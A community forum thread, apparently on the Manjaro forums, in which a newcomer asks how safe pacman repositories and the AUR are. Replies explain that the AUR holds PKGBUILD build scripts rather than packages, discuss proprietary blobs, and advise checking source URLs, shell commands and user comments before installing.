How safe is AUR and pacman in general?

Hello,

I am new to Linux so my questions might be dumb, let me apologize for that in advance.

I want to understand the philosophy of Linux (manjaro and Arch in this case) and its systems. So I have the following questions:

1. Are packages in official repositories - pacman packages - fully open source and carefully checked by devs before getting put on pacman repositories?

2. AUR. As far as I understand, it is a community-based repository and anyone can upload their packages there. It means that anybody can write a package and put it on AUR and that package can have malicious code in it. Am I getting this right?

Also, are packages from AUR fully open source too and anyone can inspect the code?

Hi @carpe,

I’m going to answer you as well as I can. I’m no expert, so someone can verify this or not.

AFAIK the question to both the answers is yes. And no. It’s kind of complicated, so let me try and explain:

There is are the Nvidia proprietary drivers. They are, sadly, not opensource. But they are in the repositories. And their installation method is open source.

The same can be done with the AUR. The AUR is moree…flexible…open to outside input than the repositories, in that the AUR is community-driven. It’s actually a collection of scripts, one for each application, that tells pacman where to go get thee file to install, what are the neccessary dependencies and provides the instructions for installation.

These scripts, called .PKGBUILDs, are also open source and can be inspected by anyone. However, that does not mean the packages they download and install are.

I hope this makes some kind of sense. If anyone has a better way of explaining it, please tell us.

Start here: Arch Linux - ArchWiki

Then look at: Arch User Repository - ArchWiki

1. Not everything is open source, the linux-firmware package notably contains proprietary blobs for certain hardwares. This usually comes from the hardware manufacturer, so trust is as much as you trust the manufacturer.
2. Yes. The only thing that has to be open source is the PKGBUILD, the instruction to build the package. The package itself may come from anywhere. I maintain several packages that come in binary form from the developers such as AUR (en) - xoctave → http://www.xoctave.com/. As a community based repo, it’s also the community’s responsibility to flag a dangerous package. Of course this could mean there will be a victim before it’s well known that the package is dangerous but AUR maintainers and the community ain’t that slow so far.

The devs only provide a .deb pakage and .zip package.

Could one say that Debian for example is more secure system because using manjaro I have to trust someone who uploaded this package to AUR, otherwise I cannot have it.

You can’t upload a package to AUR. You only have a PKGBUILD in AUR. Everything in AUR has to obtain the package from a source.

If you read the PKGBUILD, the source is:

source=("https://downloads.exodus.com/releases/exodus-linux-x64-${pkgver}.zip"
	"${pkgname}.svg"
	"${pkgname}.desktop"
        "LICENSE")

The package is pulled directly from the Exodus website to be built on your system.

So this is false information:

Also, you don’t have to just trust the person. You can just view the PKGBUILD and also read all of the AUR comments for your package.

Okay that clarified things a bit!

So AUR itself does not contain any packages, it only has a PKGBUILD which is basically an instruction on where to get the package and how to build it.

Do I get this right now?

Yes. There are 2 things you should pay attention to in the PKGBUILD file: what the download source URL is (usually the main developer’s site), and the PKGBUILD file in general (as it contains shell commands to build and install the package). If something seems odd (e.g. untrustworthy source URL, or strange shell commands), don’t install the package. But so far I haven’t encountered any harmful AUR package. So there’s probably rarely any malicious stuff (if at all). It’s still good practice to always check the PKGBUILD for oddities. If you use “pacaur” to install packages from AUR (for example), it will always offer you to view the PKGBUILD file before building/installing the package (and it defaults to yes).

What about bin files that are already prebuilt? Is there anyway to check those properly apart from reading any pinned comments etc

As long as the programs from the repos are sufficient for the user, the question of the AUR will not arise. But I don’t know anyone in my Manjaro environment, who doesn’t depend on builds from the AUR. So I find it all the worse, that there are e.g. outdated builds which are based on QT4, or device drivers, that have long been obsolete. Before one deals with the safety of the AUR, the garbage should first be removed there, in order to create an overview. Otherwise the AUR will remain poking around in garbage for usable items. And yes, the question is, who should do it.

That is why, the first time you install something from the AUR or when you enable it, I can’t remember which, you receive a warning informing you that it’s not Manjaro’s software or the responsibility of Manjaro. That you’re on your own.

And there are comments on aur.archlinux.org that verify or discredits a package. And I believe it’s effective as well.

For me, I see a flooding problem with reading stuff at Manjaro.
Before an update: read the announcements
Before installing from AUR: read the comments from aur.archlinux.org
After an unsuccessful installation from the repos: read in the communty, what could have gone wrong.
I can understand people well, for whom this is too much expense for an supposedly, simple operating system. No offense…

None take.

I understand completely where you’re coming from. But simple != brainless.

I really, really, really hate the “feed me with a spoon or I’m not having any” attitude some people have.

People are born with brains. They should actually use them. It opens a whole new world!

You could told me more kindly, that you can’t live with my opinion. I hope this remains an isolated incident. All the best

Also, the entirety of an operating system including all programs running on it can hardly be called “simple”.

In general, repositories like the default pacman package repositories or other repositories of other distros or the AUR as a user repository should already offer quite a bit of security because they are used by lots of other people, the packages are flagged, voted on, commented on, etc. There is little room for malicious uploads. Like in any repository (or “store” if you will).

Windows users are comparatively more at risk (maybe without realizing it) because they’re used to going to lots of different websites from lots of different developers or companies to download their packages from, and there’s always a chance that one of those sites might offer malicious downloads. It’s also quite “normal” that big download sites offer customized installers to include various spyware. The user has to be aware of that at all times.

Linux users have the luxury of getting their stuff usually from just in 1 or very few places and there’s less room for malicious packages. I think overall the risk is quite low.

But, as always: security is a process. Not a button, not a software, not a one-time-thing that you forget at some point. It’s a constant process and the user has to incorporate that into every decision he makes. That means: better to be safe than sorry. If you know bash scripts, it takes just a few seconds to go over a PKGBUILD file. And then you can sleep better at night.

I can live with it, just not by it, and I wasn’t trying to offend or be rude. Apologies if it came over that way.

And you too, man!

Your assertions (and examples) that 'garbage should be removed` is absolutely meaningless to that person who might need that QT4 application, or who have a 'puter from the early 00’s that need that old driver.

Are you using python2 anywhere? If you are, when the Arch devs finally rid Arch of python2, should everything python2 in the AUR be arbitrarily deleted as well?

I just do not understand…
The QT-4 support was officially discontinued by the Manjaro team with the December update. What sense does it make to continue to bet on a dead horse QT-4, especially since QT-6 is already in the starting blocks? Now experiences with drivers from the AUR . As an example, I will name a driver from the AUR for the Epson V370 scanner. If you install it again under XFCE after the Manjaro November update, your working scanner will turn into a humming corpse that can only be reanimated with timeshift. I mean to say that AUR is always playing with fire and, in my experience, the slightest concerns about safety are to be seen. The number of reports of non-working software from the AUR compared to reports of potential dangers seems to admit my experience. In conclusion, I have now given my opinion on this controversial issue.

By the way, there is always an easier answer; isn’t it?.. For all the newbies here; if you want to see whether a package is worth considering or not follow this pretty easy tip, considering you have the AUR set up on your system:

1. Open Pamac the same way you open any other program on your chosen DE.
2. Click on the search button on the top left of the Pamac window.
3. Type your desired package name on the search bar. Let us to use “Google Chrome” as an example.
4. A list of packages will to be presented to you. Among the first packages listes you’ll find “google-chrome 89.0.4389.90-1”. This is the current Chrome stable release for the web browser (developer, beta or open source Chromium packages might to be shown before this package, among some chromium plugins from the official repositories). Now double-click the package name.
5. Now you’ll notice there is a page with lots of information. The ones really relevant are:
   a) The program source’s website.
   b) The package build AUR location website.
   c) First submission date.
   d) Last modified date.
   e) Votes.
6. With all this information on hand you have all the basics to consider a package’s relevance. Obviously such a long gone unmaintained package is very likely prone to not work very well on your system… A rarely, if ever voted package is prone to not be worth as well, unless it is pretty recent. The choice is your’s ultimately!..

Note: I don’t know any package system garbage free, unless it is brand new or mostly unused!.. Fortunately here in Linux, at least we have things mostly centralized right now… But again: The user has the final word!..

Have a nice day!..

I think so too.